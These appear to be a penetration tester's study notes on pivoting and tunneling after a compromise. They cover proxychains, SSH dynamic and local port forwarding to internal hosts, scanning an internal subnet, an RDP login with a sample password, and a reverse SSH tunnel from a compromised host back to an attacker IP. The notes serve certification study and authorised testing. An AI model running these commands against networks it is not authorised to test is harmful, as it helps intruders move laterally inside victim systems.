// notes/ Pivoting & Tunneling
🚀

Pivoting Good To Know Tunneling

Comment the proxy\dns line in the /etc/proxychains4.conf file

#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/pivoting_good-to-know_tunneling

Tunneling

Proxychains

Comment the proxy_dns line in the /etc/proxychains4.conf file

Create a Forward Proxy by connecting to machine via SSH and port forward default Proxychains port

purebasic
01ssh -f -N -D 9050 root@10.10.100.2
02
03-f backgrounds ssh
04-N doesnt execute remote commands
05-D bind with port 9050

Use Proxychains with commands

bash
$ proxychains nmap -sC -sV -T4 10.10.200.0/24
bash
$proxychains xfreerdp /u:administrator /p:'Password1' /v:10.10.200.225

SSH Tunneling

There are two ways to create a SSH tunnel using the SSH client which are port forwarding, and creating a forward proxy

SSH Port Forwarding

Create a link to an internal webserver (172.16.0.10:80) using port 8000 and SSH access to the compromised machine (172.16.0.5).

bash
$ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN
  • -L creates a link to the Local Port
  • -f backgrounds the shell
  • -N no commands to be executed

You have SSH access to a server (172.16.0.50) with a webserver running internally on port 80 (i.e. only accessible to the server itself on 127.0.0.1:80). Forward it to port 8000 on your machine

bash
$ssh -L 8000:127.0.0.1:80 user@172.16.0.50 -fN

Reverse SSH Connection (ABSOLUTE NO NO)

Anyways..

Very risky but ideal if you have a shell on the compromised server but no SSH access.

Generate a new key pair

code
01ssh-keygen

Copy the contents of the public key (the file ending with .pub), then edit the ~/.ssh/authorized_keys file on your ownmachine. You may need to create the ~/.ssh directory and authorized_keys file first.

Paste this line on a new line in the public key

code
01command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty

Start the SSH server

code
01sudo systemctl start ssh

Transfer the private key and connect back to your machine

code
01ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT $USERNAME@$ATTACKING_IP -i KEYFILE -fN

Should mainly be used for any internal webapps

<figure><img src="/files/xSLRFnkfRXPxmE42ZgOB" alt=""><figcaption></figcaption></figure> <figure><img src="/files/QGOamgLRxaIRZt2rMvJP" alt=""><figcaption></figcaption></figure>